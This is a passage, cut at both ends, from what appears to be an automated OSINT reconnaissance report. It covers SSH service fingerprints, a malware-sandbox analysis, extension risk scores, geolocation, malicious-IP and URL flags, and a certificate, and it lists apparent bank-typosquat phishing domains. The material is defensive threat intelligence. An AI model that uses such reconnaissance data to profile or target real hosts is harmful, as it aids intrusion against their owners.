"www3citizensbnk01.ddns.net", "www3citlzensbnk.ddns.net", "www.46-101-229-70.cprapid.com", "46-101-229-70.cprapid.com", "intelligent-euclid.46-101-229-70.plesk.page", "jnbt05.easypanel.host", "mail.46-101-229-70.cprapid.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T07:25:44.640117776Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "28960,64,true,MSTNW,1460,false,false", "os": "Ubuntu / Debian / CentOS", "id": 72}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "654b926728b59e31856ca456546380aae9ad6f0105be964db40d456c35d8474b", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "b/8s4eFX87LHgM34ZW3g9GyhRKNQyQUUsPt17LQ/ZJc=", "x": "OF+EuiYliuprX40ENBhAbc+GOunuKTpVTjg/1oXm5JM=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}], "autonomous_system": {"bgp_prefix": "46.101.128.0/17", "country_code": "US", "asn": 14061, "name": "DIGITALOCEAN-ASN", "description": "DIGITALOCEAN-ASN"}} |
| 2023-05-12 02:53:55 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 24, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://zeptojs.com/zepto.min.js', u'signatures': [{u'category': u'General', u'origin': u'API Call', u'identifier': u'api-22', u'name': u'Fails to load modules at runtime', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1574/002', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-641', u'attck_id': u'T1574.002', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" failed to load missing module "MDMRegistration.dll" - [base:0; Status:c000000d]\n "msedge.exe" failed to load missing module "netapi32.dll" - [base:0; Status:c000000d]\n "msedge.exe" failed to load missing module "%WINDIR%\\system32\\hevcdecoder.dll" - [base:0; Status:c0000135]\n "msedge.exe" failed to load missing module "d3d11.dll" - [base:0; Status:c000000d]\n "msedge.exe" failed to load missing module "d3d12.dll" - [base:0; Status:c000000d]'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6140:120:WilError_01"\n "Local\\SM0:4356:304:WilStaging_02"\n "InternetShortcutMutex"\n "SM0:4356:120:WilError_01"\n "Local\\SM0:4356:120:WilError_01"\n "SM0:6140:120:WilError_01"\n "Local\\SM0:6140:304:WilStaging_02"\n "ChromeProcessSingletonStartup!"\n "SM0:6140:304:WilStaging_02"\n "Local\\SM0:6140:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:6140:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6140:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:6140:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"zeptojs.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'""baysidebuddy.com"," (Indicator: "ebuddy.com")\n ""comeherebuddy.com"," (Indicator: "ebuddy.com")\n ""www.facebook.com"," (Indicator: "facebook.com")\n ""linkedin.com"," (Indicator: "linkedin.com")\n ""paypal.com"," (Indicator: "paypal")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""4amscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""99centsubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""allieandmickey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""beautiiskey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""beautyandwhiskey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""bellagracehealthscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""belleandbubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""beyondblessedscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""blingbykey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""boosted-luckey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""bowlingmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""burgeonbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""busybeescrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-203', u'name': u'Tries to access LNK files (Windows shortcut)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-497', u'attck_id': u'T1083', u'relevance': 3, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" trying to access LNK file "C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\MICROSOFT EDGE.LNK"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.2353.0\\shopping.js]- [targetUID: 00000000-00006140]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.32\\Ruleset Data]- [targetUID: 00000000-00006140]\n "wallet-stable.json" has type "ASCII text"- Location: [%TEMP%\\6140_130057699\\json\\wallet\\wallet-stable.json]- [targetUID: 00000000-00006140]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.2353.0\\edge_driver.js]- [targetUID: 00000000-00006140]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.2353.0\\edge_driver.js]- [targetUID: 00000000-00006140]\n "Filtering Rules" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.45\\Filtering Rules]- [targetUID: 00000000-00006140]\n "wallet.bundle.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%TEMP%\\6140_130057699\\wallet.bundle.js]- [targetUID: 00000000-00006140]\n "vendor.bundle.js" has type "ASCII text with very long lines"- Location: [%TEMP%\\6140_130057699\\vendor.bundle.js]- [targetUID: 00000000-00006140]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\DawnCache\\data_1]- [targetUID: 00000000-00006140]\n "wallet-drawer.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\6140_130057699\\Wallet-Checkout\\wallet-drawer.bundle.js]- [targetUID: 00000000-00006140]\n "edge_confirmation_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6140_1593005669\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00006140]\n "product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6140_1593005669\\product_page.js]- [targetUID: 00000000-00006140]\n "edge_checkout_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6140_1593005669\\edge_checkout_page_validator.js]- [targetUID: 00000000-00006140]\n "auto_open_controller.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6140_1593005669\\auto_open_controller.js]- [targetUID: 00000000-00006140]\n "tokenized-card.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\6140_130057699\\Tokenized-Card\\tokenized-card.bundle.js]- [targetUID: 00000000-00006140]\n "notification.bundle.js" has type "ASCII text with very long lines"- Location: [%TEMP%\\6140_130057699\\Notification\\notification.bundle.js]- [targetUID: 00000000-00006140]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Platform Notifications\\000003.log]- [targetUID: 00000000-00006140]\n "Filtering Rules-AA" has type "data"- Location: [%TEMP%\\6140_1928901235\\Filtering Rules-AA]- [targetUID: 00000000-00006140]\n "load_statistics.db" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db]- [targetUID: 00000000-00006140]\n "shoppingfre.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6140_1593005669\\shoppingfre.js]- [targetUID: 00000000-00006140]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-50', u'name': u'Creates a license file', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-497', u'attck_id': u'T1083', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"wallet-drawer.bundle.js.LICENSE.txt" has type "Unk | 185.199.109.153 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | mariposa (Net ID: 00:01:24:F1:B8:36) | 37.7642, -122.3993 |
| 2023-05-12 02:44:50 | Raw Data from RIRs | No | CRXcavator | 1 | 0 | 1 | 0 | None | [{"platform": "Chrome", "version": "2.1", "data": {"entrypoints": {"window.addEventListener": {"/tmp/ppaeilehlbalfblndppebfpgikeodlaj_2.1/js/jstorage.min.js": [14, 15]}, "chrome.tabs.query": {"/tmp/ppaeilehlbalfblndppebfpgikeodlaj_2.1/js/custom-popup.js": [59, 82], "/tmp/ppaeilehlbalfblndppebfpgikeodlaj_2.1/js/popup.js": [13], "/tmp/ppaeilehlbalfblndppebfpgikeodlaj_2.1/js/background.js": [34, 49]}, "chrome.runtime.onMessage": {"/tmp/ppaeilehlbalfblndppebfpgikeodlaj_2.1/js/content.js": [367], "/tmp/ppaeilehlbalfblndppebfpgikeodlaj_2.1/js/background.js": [4], "/tmp/ppaeilehlbalfblndppebfpgikeodlaj_2.1/js/custom-popup.js": [21]}}, "risk": {"webstore": {"website": 1, "last_updated": 2, "users": 1, "address": 1, "total": 7, "support_site": 1, "rating_users": 1}, "retire": {"total": 110, "medium": 100, "low": 10}, "permissions": {"total": 30}, "total": 524, "csp": {"script-src": 1, "total": 377, "object-src": 1}, "metadata": {}}, "extcalls": ["https://s.click.aliexpress.com/deep_link.htm?aff_short_key=_DClxvSL&dl_target_url=", "https://www.ebay.", "http://www.dropshipping-ebay.com", "https://", "https://www.google.com/analytics/web/inpage/pub/inpage.js?", "https://ssl.google-analytics.com/j/__utm.gif", "http://www.google-analytics.com", "https://www.google.%/ads/ga-audiences?", "http://www.google.com/"], "retire": [{"results": [{"detection": "filename", "vulnerabilities": [{"info": ["https://github.com/jquery/jquery/issues/2432", "http://blog.jquery.com/2016/01/08/jquery-2-2-and-1-12-released/", "https://nvd.nist.gov/vuln/detail/CVE-2015-9251", "http://research.insecurelabs.org/jquery/test/"], "identifiers": {"CVE": ["CVE-2015-9251"], "issue": "2432", "summary": "3rd party CORS request may execute"}, "severity": "medium"}, {"info": ["https://bugs.jquery.com/ticket/11974", "https://nvd.nist.gov/vuln/detail/CVE-2015-9251", "http://research.insecurelabs.org/jquery/test/"], "identifiers": {"CVE": ["CVE-2015-9251"], "issue": "11974", "summary": "parseHTML() executes scripts in event handlers"}, "severity": "medium"}, {"info": ["https://blog.jquery.com/2019/04/10/jquery-3-4-0-released/", "https://nvd.nist.gov/vuln/detail/CVE-2019-11358", "https://github.com/jquery/jquery/commit/753d591aea698e57d6db58c9f722cd0808619b1b"], "identifiers": {"CVE": ["CVE-2019-11358"], "summary": "jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution"}, "severity": "medium"}, {"info": ["https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/"], "identifiers": {"CVE": ["CVE-2020-11022"], "summary": "Regex in its jQuery.htmlPrefilter sometimes may introduce XSS"}, "severity": "medium"}, {"info": ["https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/"], "identifiers": {"CVE": ["CVE-2020-11023"], "summary": "Regex in its jQuery.htmlPrefilter sometimes may introduce XSS"}, "severity": "medium"}, {"info": ["https://github.com/jquery/jquery.com/issues/162"], "identifiers": {"summary": "jQuery 1.x and 2.x are End-of-Life and no longer receiving security updates"}, "severity": "low"}], "version": "2.2.4.min", "component": "jquery"}], "file": "/tmp/ppaeilehlbalfblndppebfpgikeodlaj_2.1/js/jquery-2.2.4.min.js"}], "related": {"nngceckbapebfimnlniiiahkandclblb": {"rating": 4.7743354, "users": 3000000, "platform": "", "short_description": "A secure and free password manager for all of your devices.", "icon": "https://lh3.googleusercontent.com/J_l8abQyJgx7POjRoDfGaFYWFnYQNpRSy4kH5IlbwSdM-l_gZf2rJlk2NLSQTY8g-U2vrclpb0EZApHyOe6sjzbKcUc=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 5229, "name": "Bitwarden - Free Password Manager"}, "ohfgljdgelakfkefopgklcohadegdpjf": {"rating": 4.65096, "users": 3000000, "platform": "", "short_description": "Easy-to-use PDF tools to Edit, Convert, Merge, Split and Compress PDF files.", "icon": "https://lh3.googleusercontent.com/JeGWeZiGxLb3KWGAn6FWnAjCyJDsmC7lu_O_x-h8TpDGQRa_VBnOhh-Uxh_XocOgczrfiPO_hzR_MDCleFQJeyiMwg=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 2865, "name": "Smallpdf - Edit, Compress and Convert PDF"}, "kgjfgplpablkjnlkjmjdecgdpfankdle": {"rating": 3.891328, "users": 8000000, "platform": "", "short_description": "Schedule Zoom meetings directly from Google Calendar", "icon": "https://lh3.googleusercontent.com/EtDJ1WOrJu9vJxqUpk67gAWSsvf7llrIu3UIxOVFQMS6BIxdN3fKOe0NBBHDxVS6G5ov4yxKcxAELtkfhBLMlO7r1Q=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 911, "name": "Zoom Scheduler"}, "icnekagcncdgpdnpoecofjinkplbnocm": {"rating": 4.4411764, "users": 2000000, "platform": "", "short_description": "Read articles without distractions - use reader view. Make your reading process exceptional.", "icon": "https://lh3.googleusercontent.com/YBio0Hy33x3naSYfOCJBEMCntZexQLygzl17tRtLkxQXhR6esY8BtGoe7tgYNDmg3ZYAC2iTrQBdY-NVWXivPsn6r5A=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 34, "name": "Easyview Reader view"}, "fejgiddmdpgdmhhdjbophmflidmdpgdi": {"rating": 4.3333335, "users": 2000000, "platform": "", "short_description": "Increase audio volume up to 600% from the maximum! Boost your sound", "icon": "https://lh3.googleusercontent.com/0LHATIT-6LW9AX2Yy9uzoPDenL7TkUN-C_nsXHx9fODi7cQCp97p20zVArwcsk4UcocYknKLTd5Wyr6y4iW1q5T3hWE=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 27, "name": "Volume Booster Plus"}, "efaidnbmnnnibpcajpcglclefindmkaj": {"rating": 4.290437, "users": 10000000, "platform": "", "short_description": "Do more in Google Chrome with Adobe Acrobat PDF tools. View, fill, comment, sign, and try convert and compress tools.", "icon": "https://lh3.googleusercontent.com/aqahGz3euXadmtmp8NZnuKPoUm4cmewNY0AI1a_cMsC28cfvB2Bx3NArY9Mi50o2zF45Uh74Rmmq-Bh6dJRsVAbm=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 34937, "name": "Adobe Acrobat: PDF edit, convert, sign tools"}, "laookkfknpbbblfpciffpaejjkokdgca": {"rating": 4.4679146, "users": 3000000, "platform": "", "short_description": "Replace new tab page with a personal dashboard to help you get focused, stay organized, and keep motivated to achieve your goals.", "icon": "https://lh3.googleusercontent.com/H9tXckFzG4jZjM5Ag6gvBl0dCm75uQIlextzqmubbZ4stRiSfAyRG6pna-QjMk4S5kOCeShmPMcWxlPPdKlQyDqW=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 13838, "name": "Momentum"}, "bpconcjcammlapcogcnnelfmaeghhagj": {"rating": 4.6261697, "users": 1000000, "platform": "", "short_description": "Record screencasts - record video from your screen. Screen Capture FULL Web page or any part. Edit screenshots.", "icon": "https://lh3.googleusercontent.com/VOnmhiXEBw4cIinxoJYNVSdqWr-xOchHol4frxQCitlE2mmsh1TByQ2zYNDv8sdyEP0lNrmwY4_FOi64MV1WQCnRS6U=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 16882, "name": "Nimbus Screenshot & Screen Video Recorder"}, "admmjipmmciaobhojoghlmleefbicajg": {"rating": 3.0946643, "users": 4000000, "platform": "", "short_description": "A cloud-based password manager that makes it easy to log in to your favorite sites.", "icon": "https://lh3.googleusercontent.com/uJX-GTxk93n7vQYuG55g9ULQFUknftFjN3ZAjbObhTQ3DIQlDHrcVfgfw7sLBpvSQDSl_Kv10WqpB1HvNUg9nWF_YQ=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 1162, "name": "Norton Password Manager"}, "gmbmikajjgmnabiglmofipeabaddhgne": {"rating": 3.9548225, "users": 7000000, "platform": "", "short_description": "Save web content or screen capture directly to Google Drive.", "icon": "https://lh3.googleusercontent.com/TFO5gDBZMhZOyeKAozOLYsxulAwh_RT7qY3vdqKt_8NTMWQjSNRLFc9CjPdkC2MSPimqwSB__nG24HKw4Y1hMdtLLw=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 4759, "name": "Save to Google Drive"}, "cjpalhdlnbpafiamejdnhcphjbkeiagm": {"rating": 4.6761365, "users": 10000000, "platform": "", "short_description": "Finally, an efficient blocker. Easy on CPU and memory.", "icon": "https://lh3.googleusercontent.com/rrgyVBVte7CfjjeTU-rCHDKba7vtq-yn3o8-10p5b6QOj_2VCDAO3VdggV5fUnugbG2eDGPPjoJ9rsiU_tUZBExgLGc=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 26400, "name": "uBlock Origin"}, "bkkbcggnhapdmkeljlodobbkopceiche": {"rating": 4.7756734, "users": 2000000, "platform": "", "short_description": "Block popups, ads, cookie requests, trackers, notifications, ads on social media & more. A clean browsing experience starts today.", "icon": "https://lh3.googleusercontent.com/R9P6olNFUIkjebO_S6vG-1SulDiFYNVgtI8U-r3rm9Gq6TI__wd5ZIdeMxEB_9jL01MmRJve7CI28HLY18dJUOFibJs=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 80784, "name": "Pop up blocker for Chrome\u2122 - Poper Blocker"}, "flliilndjeohchalpbbcdekjklbdgfkk": {"rating": 4.1474295, "users": 6000000, "platform": "", "short_description": "Your surfing made private and secure", "icon": "https://lh3.googleusercontent.com/hjQv8jaFVCyh3Df1rAM6LTeuBY0wOxZAESgsLsysTHGOCQHt5XZP_44v5HM-xIjv-1gVTUHaehBTrF2hoqNcS5RFXK0=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 2937, "name": "Avira Browser Safety"}, "mlomiejdfkolichcflejclcbmpeaniij": {"rating": 4.6202865, "users": 2000000, "platform": "", "short_description": "Ghostery is a powerful privacy extension. Block ads, stop trackers and speed up websites.", "icon": "https://lh3.googleusercontent.com/CpXOKuccvzh9oCG7G6NLr5nAvqUEdMLgfqWsYrKR92loF74N42s1B6LPtolnoVJphyP7WMTOtQRY7eAb2v61x1tOmQ=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 12836, "name": "Ghostery \u2013 Privacy Ad Blocker"}, "pgjjikdiikihdfpoppgaidccahalehjh": {"rating": 4.414451, "users": 2000000, "platform": "", "short_description": "Take a Speedtest directly from your toolbar to quickly test your internet performance without interruption.", "icon": "https://lh3.googleusercontent.com/UeJDiqRqbe61ZwRA-nshMyadO7gt5igLJN5jGy3he_VVP5iELduwit3AdBk9gTnCiDzDIQtlUJv6mQ-V7_7azrShxQ=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 2934, "name": "Speedtest by Ookla"}, "fjgncogppolhfdpijihbpfmeohpaadpc": {"rating": 4.473016, "users": 2000000, "platform": "", "short_description": "Fast, one-click access to millions of research papers.", "icon": "https://lh3.googleusercontent.com/orDWHjYrSVYleMvmm7KTV9GHN_DcjWfOUKP6MVQ-JxjaW3BUF61B9Z2gPU__qY23z764gn7FLubSqYbcZZ8H_w3LJg=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 315, "name": "EndNote Click - Formerly Kopernio"}, "gpdjojdkbbmdfjfahjcgigfpmkopogic": {"rating": 3.558845, "users": 7000000, "platform": "", "short_description": "Save your favorite ideas online so you | ayhu.xyz |
| 2023-05-12 03:11:18 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 2 | 0 | None | {u'city': u'Amsterdam', u'security': {u'is_vpn': False}, u'city_geoname_id': 2759794, u'region_geoname_id': 2749879, u'country': u'Netherlands', u'region': u'North Holland', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'CLOUDFLARENET', u'isp_name': u'Cloudflare, Inc.', u'organization_name': u'CloudFlare, Inc.', u'autonomous_system_number': 13335}, u'continent_code': u'EU', u'currency': {u'currency_name': u'Euros', u'currency_code': u'EUR'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/NL_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/NL_flag.png', u'unicode': u'U+1F1F3 U+1F1F1', u'emoji': u'\U0001f1f3\U0001f1f1'}, u'postal_code': u'1012', u'longitude': 4.8975, u'country_code': u'NL', u'timezone': {u'abbreviation': u'CEST', u'gmt_offset': 2, u'is_dst': True, u'name': u'Europe/Amsterdam', u'current_time': u'05:11:17'}, u'latitude': 52.3759, u'country_geoname_id': 2750405, u'continent_geoname_id': 6255148, u'country_is_eu': True, u'ip_address': u'188.114.97.1', u'continent': u'Europe', u'region_iso_code': u'NH'} | 188.114.97.1 |
| 2023-05-12 03:00:58 | Malicious Affiliate | Yes | VXVault.net | 0 | 1 | 3 | 0 | None | VXVault Malicious URL List [cdn-185-199-110-153.github.com]
http://vxvault.net/URL_List.php | cdn-185-199-110-153.github.com |
| 2023-05-12 02:52:11 | Malicious IP Address | Yes | VirusTotal | 0 | 1 | 3 | 0 | None | VirusTotal [172.67.168.252]
https://www.virustotal.com/en/ip-address/172.67.168.252/information/ | 172.67.168.252 |
| 2023-05-12 02:50:16 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | nwapi.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:74:c7:69:09:be:bf:85:53:83:95:0e:84:5e:23:6b:8f:95
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 27 17:04:53 2023 GMT
Not After : Jun 25 17:04:52 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:c0:92:2b:06:a8:76:be:87:ad:a1:7a:9e:5a:24:
59:36:93:77:df:2f:5f:ec:5d:f8:39:5c:9e:e9:bb:
24:38:91:de:54:5b:7a:21:bd:81:66:b9:f4:29:4c:
2b:fa:57:13:7e:92:b4:15:86:67:29:e9:3d:cd:52:
95:9b:57:3a:5d:e6:e9:45:19:f1:e0:94:39:75:06:
